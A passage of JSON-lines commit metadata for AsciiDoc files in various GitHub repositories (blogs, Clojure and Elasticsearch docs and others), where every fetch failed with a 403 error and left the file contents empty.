Case","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-11-24-Incase-Perforated-Snap-Case--iPhone-4-u0026-4S-Case.adoc","new_file":"_posts\/2011-11-24-Incase-Perforated-Snap-Case--iPhone-4-u0026-4S-Case.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"29e61464743e05e5f3a7ff5430da337d91da60f0","subject":"Update 2016-05-25-Starting-up-blogging-again-with-Hub-Press-this-time.adoc","message":"Update 2016-05-25-Starting-up-blogging-again-with-Hub-Press-this-time.adoc","repos":"sgalles\/sgalles.github.io,sgalles\/sgalles.github.io,sgalles\/sgalles.github.io,sgalles\/sgalles.github.io","old_file":"_posts\/2016-05-25-Starting-up-blogging-again-with-Hub-Press-this-time.adoc","new_file":"_posts\/2016-05-25-Starting-up-blogging-again-with-Hub-Press-this-time.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sgalles\/sgalles.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"16e59ad5037b8b1eeb4ec352d30237ad8e3304af","subject":"Update 2018-03-10-Postmorkem-of-J-SK-2018-The-Search-for-Golden-Coins.adoc","message":"Update 2018-03-10-Postmorkem-of-J-SK-2018-The-Search-for-Golden-Coins.adoc","repos":"manelvf\/blog,manelvf\/blog,manelvf\/blog,manelvf\/blog","old_file":"_posts\/2018-03-10-Postmorkem-of-J-SK-2018-The-Search-for-Golden-Coins.adoc","new_file":"_posts\/2018-03-10-Postmorkem-of-J-SK-2018-The-Search-for-Golden-Coins.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/manelvf\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8dfa67021ac723fd74346f04330d4c95bdc66c54","subject":"Update 2015-02-19-Puppet-Module-Triage.adoc","message":"Update 2015-02-19-Puppet-Module-Triage.adoc","repos":"thiderman\/daenney.github.io,thiderman\/daenney.github.io,thiderman\/daenney.github.io","old_file":"_posts\/2015-02-19-Puppet-Module-Triage.adoc","new_file":"_posts\/2015-02-19-Puppet-Module-Triage.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/thiderman\/daenney.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7281ea2eb82084717a1ef8e2e284c18746b57394","subject":"y2b create post The Weirdest One Yet?","message":"y2b create post The Weirdest One Yet?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-05-23-The-Weirdest-One-Yet.adoc","new_file":"_posts\/2016-05-23-The-Weirdest-One-Yet.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a7ee0e37ff41583155cb682fd3606fe28a3b3629","subject":"Update 2015-03-30-Documentation-online.adoc","message":"Update 2015-03-30-Documentation-online.adoc","repos":"fw4spl-org\/fw4spl-blog,fw4spl-org\/fw4spl-blog,fw4spl-org\/fw4spl-blog","old_file":"_posts\/2015-03-30-Documentation-online.adoc","new_file":"_posts\/2015-03-30-Documentation-online.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fw4spl-org\/fw4spl-blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b79d31afde736346ca1416e8f0568c1907694b87","subject":"add news item","message":"add news item\n","repos":"clojure\/clojure-site","old_file":"content\/news\/2022\/04\/05\/clojure-1-11-1.adoc","new_file":"content\/news\/2022\/04\/05\/clojure-1-11-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"1c1dbc8fa6f60868f2422442a9279fa7b04a6305","subject":"update to threading guide","message":"update to threading guide\n","repos":"clojure\/clojure-site","old_file":"content\/guides\/threading_macros.adoc","new_file":"content\/guides\/threading_macros.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"0fb46f4c6953cc491fbd3823812ce05accbc5f67","subject":"update title","message":"update title","repos":"podviaznikov\/podviaznikov.com","old_file":"content\/writings\/second.adoc","new_file":"content\/writings\/second.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/podviaznikov\/podviaznikov.com.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"34a46baddfdda87da1225deee0391dab3ae25e7d","subject":"Click +","message":"Click +\n","repos":"oliviercailloux\/java-course,oliviercailloux\/java-course","old_file":"Dev tools\/Eclipse.adoc","new_file":"Dev tools\/Eclipse.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oliviercailloux\/java-course.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"edf7faab501937478c6dfa308a1353b50e292030","subject":"y2b create post Charge Your Phone With A Lamp","message":"y2b create post Charge Your Phone With A Lamp","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-02-20-Charge-Your-Phone-With-A-Lamp.adoc","new_file":"_posts\/2016-02-20-Charge-Your-Phone-With-A-Lamp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fec6d560b68d9b44465b624e00dc1a10302dddd3","subject":"y2b create post iPhone 6S - No More Bend?","message":"y2b create post iPhone 6S - No More Bend?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2015-08-10-iPhone-6S--No-More-Bend.adoc","new_file":"_posts\/2015-08-10-iPhone-6S--No-More-Bend.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b84cf26812c4fd75417b8229d366abada9720892","subject":"Update 2016-03-18-Blah-2.adoc","message":"Update 2016-03-18-Blah-2.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-03-18-Blah-2.adoc","new_file":"_posts\/2016-03-18-Blah-2.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ddc7dd61bb294454146bc909f6e75e57a70c0da7","subject":"y2b create post It's So Oddly Satisfying...","message":"y2b create post It's So Oddly Satisfying...","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-02-13-Its-So-Oddly-Satisfying.adoc","new_file":"_posts\/2017-02-13-Its-So-Oddly-Satisfying.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"0dceac3a1169a8afef54f67bb361e86afcfc8734","subject":"Publish 2016-7-2-thinphp.adoc","message":"Publish 2016-7-2-thinphp.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"2016-7-2-thinphp.adoc","new_file":"2016-7-2-thinphp.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c8529e3db82c0134fe19cd401e7c711a4846a472","subject":"website release guide draft","message":"website release guide draft\n","repos":"pax95\/camel,tadayosi\/camel,apache\/camel,apache\/camel,tadayosi\/camel,christophd\/camel,cunningt\/camel,adessaigne\/camel,apache\/camel,tadayosi\/camel,tadayosi\/camel,cunningt\/camel,christophd\/camel,adessaigne\/camel,adessaigne\/camel,cunningt\/camel,apache\/camel,tadayosi\/camel,cunningt\/camel,pax95\/camel,pax95\/camel,pax95\/camel,adessaigne\/camel,christophd\/camel,cunningt\/camel,adessaigne\/camel,adessaigne\/camel,pax95\/camel,pax95\/camel,christophd\/camel,apache\/camel,apache\/camel,christophd\/camel,cunningt\/camel,tadayosi\/camel,christophd\/camel","old_file":"docs\/user-manual\/modules\/ROOT\/pages\/release-guide-website.adoc","new_file":"docs\/user-manual\/modules\/ROOT\/pages\/release-guide-website.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/adessaigne\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"38938d48fcf30daa91ef1a390a5fa795d72c19b1","subject":"New page to hold list of abbrieviatins","message":"New page to hold list of abbrieviatins\n","repos":"EBISPOT\/goci,EBISPOT\/goci,EBISPOT\/goci,EBISPOT\/goci,EBISPOT\/goci,EBISPOT\/goci","old_file":"goci-interfaces\/goci-ui\/src\/main\/docs\/abbreviations-content.adoc","new_file":"goci-interfaces\/goci-ui\/src\/main\/docs\/abbreviations-content.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/EBISPOT\/goci.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"4f30c62d968c3a33779a4464e4c58be46ee20ec1","subject":"CIP2015-08-06 Date and Time","message":"CIP2015-08-06 Date and Time\n","repos":"opencypher\/openCypher,opencypher\/openCypher,opencypher\/openCypher,opencypher\/openCypher","old_file":"cip\/1.accepted\/CIP2015-08-06-date-time.adoc","new_file":"cip\/1.accepted\/CIP2015-08-06-date-time.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/opencypher\/openCypher.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"f3670636642025c527255a13a84540a1c50c8194","subject":"Create 2014-09-12-forge-2.10.1.final.asciidoc","message":"Create 2014-09-12-forge-2.10.1.final.asciidoc","repos":"addonis1990\/docs,luiz158\/docs,forge\/docs,agoncal\/docs,luiz158\/docs,forge\/docs,addonis1990\/docs,agoncal\/docs","old_file":"news\/2014-09-12-forge-2.10.1.final.asciidoc","new_file":"news\/2014-09-12-forge-2.10.1.final.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/addonis1990\/docs.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"2f2f1fa57c3fb93a1ec7c8c2a308224e51f69b24","subject":"added","message":"added\n","repos":"m-m-m\/util,m-m-m\/util","old_file":"CONTRIBUTING.adoc","new_file":"CONTRIBUTING.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/m-m-m\/util.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"220979ad87eb4ea84a3f2fbcd9a6604a379c6fc1","subject":"add new deps reference for current prerelease","message":"add new deps reference for current prerelease\n","repos":"clojure\/clojure-site","old_file":"content\/reference\/deps_and_cli_prerelease.adoc","new_file":"content\/reference\/deps_and_cli_prerelease.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"41ffb008ad285735f8bc3c9b97b23c6589a17fef","subject":"Fix doc bug for cgroup cpuacct usage metric","message":"Fix doc bug for cgroup cpuacct usage metric\n\nThis commit fixes a silly doc bug where the field that represents the\ntotal CPU time consumed by all tasks in the same cgroup was mistakenly\nreported as \"usage\" instead of \"usage_nanos\".\n\nRelates #21029\n","repos":"GlenRSmith\/elasticsearch,mortonsykes\/elasticsearch,robin13\/elasticsearch,obourgain\/elasticsearch,markwalkom\/elasticsearch,jimczi\/elasticsearch,LewayneNaidoo\/elasticsearch,kalimatas\/elasticsearch,rlugojr\/elasticsearch,nilabhsagar\/elasticsearch,coding0011\/elasticsearch,jimczi\/elasticsearch,wenpos\/elasticsearch,geidies\/elasticsearch,pozhidaevak\/elasticsearch,alexshadow007\/elasticsearch,wenpos\/elasticsearch,MisterAndersen\/elasticsearch,glefloch\/elasticsearch,sneivandt\/elasticsearch,markwalkom\/elasticsearch,StefanGor\/elasticsearch,JackyMai\/elasticsearch,wenpos\/elasticsearch,scorpionvicky\/elasticsearch,nezirus\/elasticsearch,robin13\/elasticsearch,nezirus\/elasticsearch,winstonewert\/elasticsearch,JSCooke\/elasticsearch,elasticdog\/elasticsearch,s1monw\/elasticsearch,fernandozhu\/elasticsearch,strapdata\/elassandra,mohit\/elasticsearch,shreejay\/elasticsearch,coding0011\/elasticsearch,Stacey-Gammon\/elasticsearch,Helen-Zhao\/elasticsearch,nknize\/elasticsearch,jimczi\/elasticsearch,obourgain\/elasticsearch,LeoYao\/elasticsearch,fred84\/elasticsearch,alexshadow007\/elasticsearch,nazarewk\/elasticsearch,bawse\/elasticsearch,MaineC\/elasticsearch,scottsom\/elasticsearch,robin13\/elasticsearch,nazarewk\/elasticsearch,markwalkom\/elasticsearch,sneivandt\/elasticsearch,wangtuo\/elasticsearch,artnowo\/elasticsearch,elasticdog\/elasticsearch,GlenRSmith\/elasticsearch,jprante\/elasticsearch,shreejay\/elasticsearch,C-Bish\/elasticsearch,nezirus\/elasticsearch,gingerwizard\/elasticsearch,rajanm\/elasticsearch,nknize\/elasticsearch,fforbeck\/elasticsearch,Helen-Zhao\/elasticsearch,obourgain\/elasticsearch,henakamaMSFT\/elasticsearch,LeoYao\/elasticsearch,jimczi\/elasticsearch,JSCooke\/elasticsearch,uschindler\/elasticsearch,masaruh\/elasticsearch,fforbeck\/elasticsearch,jprante\/elasticsearch,ZTE-PaaS\/elasticsearch,HonzaKral\/elasticsearch,pozhidaevak\/elasticsearch,mortonsykes\/elasticsearch,fred84\/elasticsearch,nezirus\/elasticsearch,IanvsPoplicola\/elasticsearch,lks21c\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,s1monw\/elasticsearch,umeshdangat\/elasticsearch,geidies\/elasticsearch,mikemccand\/elasticsearch,gingerwizard\/elasticsearch,pozhidaevak\/elasticsearch,StefanGor\/elasticsearch,winstonewert\/elasticsearch,s1monw\/elasticsearch,winstonewert\/elasticsearch,a2lin\/elasticsearch,elasticdog\/elasticsearch,shreejay\/elasticsearch,glefloch\/elasticsearch,njlawton\/elasticsearch,sneivandt\/elasticsearch,mjason3\/elasticsearch,C-Bish\/elasticsearch,elasticdog\/elasticsearch,StefanGor\/elasticsearch,brandonkearby\/elasticsearch,naveenhooda2000\/elasticsearch,njlawton\/elasticsearch,nezirus\/elasticsearch,coding0011\/elasticsearch,kalimatas\/elasticsearch,gingerwizard\/elasticsearch,IanvsPoplicola\/elasticsearch,rajanm\/elasticsearch,umeshdangat\/elasticsearch,Shepard1212\/elasticsearch,IanvsPoplicola\/elasticsearch,njlawton\/elasticsearch,shreejay\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,wangtuo\/elasticsearch,a2lin\/elasticsearch,gfyoung\/elasticsearch,henakamaMSFT\/elasticsearch,shreejay\/elasticsearch,Helen-Zhao\/elasticsearch,i-am-Nathan\/elasticsearch,rajanm\/elasticsearch,uschindler\/elasticsearch,wuranbo\/elasticsearch,markwalkom\/elasticsearch,Shepard1212\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,ZTE-PaaS\/elasticsearch,qwerty4030\/elasticsearch,umeshdangat\/elasticsearch,JackyMai\/elasticsearch,sneivandt\/elasticsearch,qwerty4030\/elasticsearch,lks21c\/elasticsearch,fforbeck\/elasticsearch,GlenRSmith\/elasticsearch,MaineC\/elasticsearch,vroyer\/elasticassandra,jprante\/elasticsearch,fernandozhu\/elasticsearch,GlenRSmith\/elasticsearch,artnowo\/elasticsearch,obourgain\/elasticsearch,LewayneNaidoo\/elasticsearch,naveenhooda2000\/elasticsearch,geidies\/elasticsearch,i-am-Nathan\/elasticsearch,robin13\/elasticsearch,rlugojr\/elasticsearch,Shepard1212\/elasticsearch,masaruh\/elasticsearch,mikemccand\/elasticsearch,JSCooke\/elasticsearch,rlugojr\/elasticsearch,vroyer\/elasticassandra,alexshadow007\/elasticsearch,obourgain\/elasticsearch,kalimatas\/elasticsearch,scottsom\/elasticsearch,mortonsykes\/elasticsearch,uschindler\/elasticsearch,alexshadow007\/elasticsearch,JSCooke\/elasticsearch,nilabhsagar\/elasticsearch,qwerty4030\/elasticsearch,nknize\/elasticsearch,wangtuo\/elasticsearch,kalimatas\/elasticsearch,i-am-Nathan\/elasticsearch,mikemccand\/elasticsearch,MaineC\/elasticsearch,LewayneNaidoo\/elasticsearch,pozhidaevak\/elasticsearch,elasticdog\/elasticsearch,nilabhsagar\/elasticsearch,fred84\/elasticsearch,fernandozhu\/elasticsearch,gfyoung\/elasticsearch,mohit\/elasticsearch,maddin2016\/elasticsearch,C-Bish\/elasticsearch,GlenRSmith\/elasticsearch,scottsom\/elasticsearch,markwalkom\/elasticsearch,umeshdangat\/elasticsearch,MisterAndersen\/elasticsearch,maddin2016\/elasticsearch,mortonsykes\/elasticsearch,geidies\/elasticsearch,LeoYao\/elasticsearch,rlugojr\/elasticsearch,artnowo\/elasticsearch,nazarewk\/elasticsearch,jprante\/elasticsearch,StefanGor\/elasticsearch,bawse\/elasticsearch,scorpionvicky\/elasticsearch,nknize\/elasticsearch,gingerwizard\/elasticsearch,nknize\/elasticsearch,henakamaMSFT\/elasticsearch,gingerwizard\/elasticsearch,IanvsPoplicola\/elasticsearch,winstonewert\/elasticsearch,alexshadow007\/elasticsearch,maddin2016\/elasticsearch,wuranbo\/elasticsearch,pozhidaevak\/elasticsearch,rlugojr\/elasticsearch,vroyer\/elassandra,wangtuo\/elasticsearch,strapdata\/elassandra,mjason3\/elasticsearch,strapdata\/elassandra,wangtuo\/elasticsearch,masaruh\/elasticsearch,mohit\/elasticsearch,nazarewk\/elasticsearch,MisterAndersen\/elasticsearch,fred84\/elasticsearch,wuranbo\/elasticsearch,scorpionvicky\/elasticsearch,glefloch\/elasticsearch,rajanm\/elasticsearch,LeoYao\/elasticsearch,lks21c\/elasticsearch,strapdata\/elassandra,winstonewert\/elasticsearch,JackyMai\/elasticsearch,Helen-Zhao\/elasticsearch,maddin2016\/elasticsearch,Stacey-Gammon\/elasticsearch,geidies\/elasticsearch,brandonkearby\/elasticsearch,gfyoung\/elasticsearch,naveenhooda2000\/elasticsearch,strapdata\/elassandra,HonzaKral\/elasticsearch,jimczi\/elasticsearch,umeshdangat\/elasticsearch,rajanm\/elasticsearch,vroyer\/elassandra,a2lin\/elasticsearch,s1monw\/elasticsearch,ZTE-PaaS\/elasticsearch,njlawton\/elasticsearch,MisterAndersen\/elasticsearch,MisterAndersen\/elasticsearch,mohit\/elasticsearch,vroyer\/elassandra,mjason3\/elasticsearch,vroyer\/elasticassandra,henakamaMSFT\/elasticsearch,wenpos\/elasticsearch,LeoYao\/elasticsearch,njlawton\/elasticsearch,fred84\/elasticsearch,coding0011\/elasticsearch,fernandozhu\/elasticsearch,Stacey-Gammon\/elasticsearch,nazarewk\/elasticsearch,kalimatas\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,mjason3\/elasticsearch,fernandozhu\/elasticsearch,JackyMai\/elasticsearch,i-am-Nathan\/elasticsearch,uschindler\/elasticsearch,bawse\/elasticsearch,a2lin\/elasticsearch,artnowo\/elasticsearch,LeoYao\/elasticsearch,nilabhsagar\/elasticsearch,scorpionvicky\/elasticsearch,masaruh\/elasticsearch,scorpionvicky\/elasticsearch,MaineC\/elasticsearch,C-Bish\/elasticsearch,LeoYao\/elasticsearch,gingerwizard\/elasticsearch,gingerwizard\/elasticsearch,qwerty4030\/elasticsearch,mikemccand\/elasticsearch,C-Bish\/elasticsearch,maddin2016\/elasticsearch,henakamaMSFT\/elasticsearch,nilabhsagar\/elasticsearch,JSCooke\/elasticsearch,fforbeck\/elasticsearch,wenpos\/elasticsearch,ZTE-PaaS\/elasticsearch,jprante\/elasticsearch,mikemccand\/elasticsearch,bawse\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,lks21c\/elasticsearch,scottsom\/elasticsearch,gfyoung\/elasticsearch,LewayneNaidoo\/elasticsearch,lks21c\/elasticsearch,HonzaKral\/elasticsearch,MaineC\/elasticsearch,artnowo\/elasticsearch,Shepard1212\/elasticsearch,markwalkom\/elasticsearch,mjason3\/elasticsearch,glefloch\/elasticsearch,brandonkearby\/elasticsearch,Shepard1212\/elasticsearch,IanvsPoplicola\/elasticsearch,Helen-Zhao\/elasticsearch,a2lin\/elasticsearch,Stacey-Gammon\/elasticsearch,StefanGor\/elasticsearch,JackyMai\/elasticsearch,robin13\/elasticsearch,brandonkearby\/elasticsearch,scottsom\/elasticsearch,qwerty4030\/elasticsearch,mortonsykes\/elasticsearch,gfyoung\/elasticsearch,brandonkearby\/elasticsearch,ZTE-PaaS\/elasticsearch,HonzaKral\/elasticsearch,sneivandt\/elasticsearch,glefloch\/elasticsearch,naveenhooda2000\/elasticsearch,naveenhooda2000\/elasticsearch,wuranbo\/elasticsearch,bawse\/elasticsearch,s1monw\/elasticsearch,wuranbo\/elasticsearch,LewayneNaidoo\/elasticsearch,geidies\/elasticsearch,i-am-Nathan\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,mohit\/elasticsearch,uschindler\/elasticsearch,masaruh\/elasticsearch,rajanm\/elasticsearch,Stacey-Gammon\/elasticsearch,fforbeck\/elasticsearch,coding0011\/elasticsearch","old_file":"docs\/reference\/cluster\/nodes-stats.asciidoc","new_file":"docs\/reference\/cluster\/nodes-stats.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/obourgain\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"facce03f003d6fda751e1ca12b69a4e2321b3d70","subject":"Added symbolic link of index.adoc","message":"Added symbolic link of index.adoc\n","repos":"spring-cloud\/spring-cloud-sleuth,spring-cloud\/spring-cloud-sleuth,spring-cloud\/spring-cloud-sleuth,spring-cloud\/spring-cloud-sleuth,spring-cloud\/spring-cloud-sleuth","old_file":"docs\/src\/main\/asciidoc\/index.adoc","new_file":"docs\/src\/main\/asciidoc\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/spring-cloud\/spring-cloud-sleuth.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"5f64d0e7aaa95e01a380964c280b8ad1d67b56e1","subject":"Update 2017-04-26-Docker-moving-files-in-and-out-container.adoc","message":"Update 2017-04-26-Docker-moving-files-in-and-out-container.adoc","repos":"kfkelvinng\/kfkelvinng.github.io,kfkelvinng\/kfkelvinng.github.io,kfkelvinng\/kfkelvinng.github.io,kfkelvinng\/kfkelvinng.github.io","old_file":"_posts\/2017-04-26-Docker-moving-files-in-and-out-container.adoc","new_file":"_posts\/2017-04-26-Docker-moving-files-in-and-out-container.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kfkelvinng\/kfkelvinng.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a30a287fb46e927f845db6bfc5f89f686c7f7b31","subject":"Update 2017-07-27-Understanding-Inheritance-in-Java-Script.adoc","message":"Update 2017-07-27-Understanding-Inheritance-in-Java-Script.adoc","repos":"jbrizio\/jbrizio.github.io,jbrizio\/jbrizio.github.io,jbrizio\/jbrizio.github.io,jbrizio\/jbrizio.github.io","old_file":"_posts\/2017-07-27-Understanding-Inheritance-in-Java-Script.adoc","new_file":"_posts\/2017-07-27-Understanding-Inheritance-in-Java-Script.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jbrizio\/jbrizio.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"90ac66ff860ba0c7babc1dcdd5d0f916e9d3c0d7","subject":"modify CNCF.adoc","message":"modify CNCF.adoc\n","repos":"ipdcode\/containerfs,ipdcode\/containerfs,shenhuichao\/containerfs,zhengxiaochuan-3\/containerfs,shenhuichao\/containerfs,zhengxiaochuan-3\/containerfs,shenhuichao\/containerfs,jls502\/containerfs,shenhuichao\/containerfs,shenhuichao\/containerfs,shenhuichao\/containerfs,shenhuichao\/containerfs,ipdcode\/containerfs,ipdcode\/containerfs,ipdcode\/containerfs,shenhuichao\/containerfs,ipdcode\/containerfs,jls502\/containerfs,ipdcode\/containerfs,ipdcode\/containerfs,shenhuichao\/containerfs,ipdcode\/containerfs","old_file":"CNCF.adoc","new_file":"CNCF.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jls502\/containerfs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"31011c8b2a571f28ddda824f8b06c5907a0f3cf5","subject":"Update 2015-09-09-Phoenix-CentOS-6.adoc","message":"Update 2015-09-09-Phoenix-CentOS-6.adoc","repos":"cncgl\/cncgl.github.io,cncgl\/cncgl.github.io,cncgl\/cncgl.github.io,cncgl\/cncgl.github.io","old_file":"_posts\/2015-09-09-Phoenix-CentOS-6.adoc","new_file":"_posts\/2015-09-09-Phoenix-CentOS-6.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cncgl\/cncgl.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8f9cfb3f4515c72f4a2f8373d8dbce5f5e8a6fee","subject":"Update 2016-11-05-About-the-Author.adoc","message":"Update 2016-11-05-About-the-Author.adoc","repos":"DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io","old_file":"_posts\/2016-11-05-About-the-Author.adoc","new_file":"_posts\/2016-11-05-About-the-Author.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/DullestSaga\/dullestsaga.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9750df5002b66395d9828778cf4bd686cc874928","subject":"update content","message":"update content","repos":"podviaznikov\/podviaznikov.com","old_file":"content\/writings\/.adoc","new_file":"content\/writings\/.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/podviaznikov\/podviaznikov.com.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"2db926912df6d5af50f7bbb295c16e6964582269","subject":"fix old imix profile","message":"fix old imix profile\n","repos":"dimagol\/trex-core,dimagol\/trex-core,kisel\/trex-core,kisel\/trex-core,dimagol\/trex-core,dimagol\/trex-core,kisel\/trex-core,kisel\/trex-core,dimagol\/trex-core,dimagol\/trex-core,kisel\/trex-core,kisel\/trex-core","old_file":"draft_trex_stateless.asciidoc","new_file":"draft_trex_stateless.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kisel\/trex-core.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"1bedb99b8d397caadd1151bcfffee37856c9e5bd","subject":"Delete 2016-5-13-Engineer-Career-Path.adoc","message":"Delete 2016-5-13-Engineer-Career-Path.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"2016-5-13-Engineer-Career-Path.adoc","new_file":"2016-5-13-Engineer-Career-Path.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3f17eef70225302cc891bff0ddceac8603175962","subject":"Update 2015-5-10-uGui.adoc","message":"Update 2015-5-10-uGui.adoc","repos":"TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io,TheGertproject\/TheGertproject.github.io","old_file":"_posts\/2015-5-10-uGui.adoc","new_file":"_posts\/2015-5-10-uGui.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/TheGertproject\/TheGertproject.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"20be43b140fea07a4903af818d8e8e707eef8a5c","subject":"html styling","message":"html 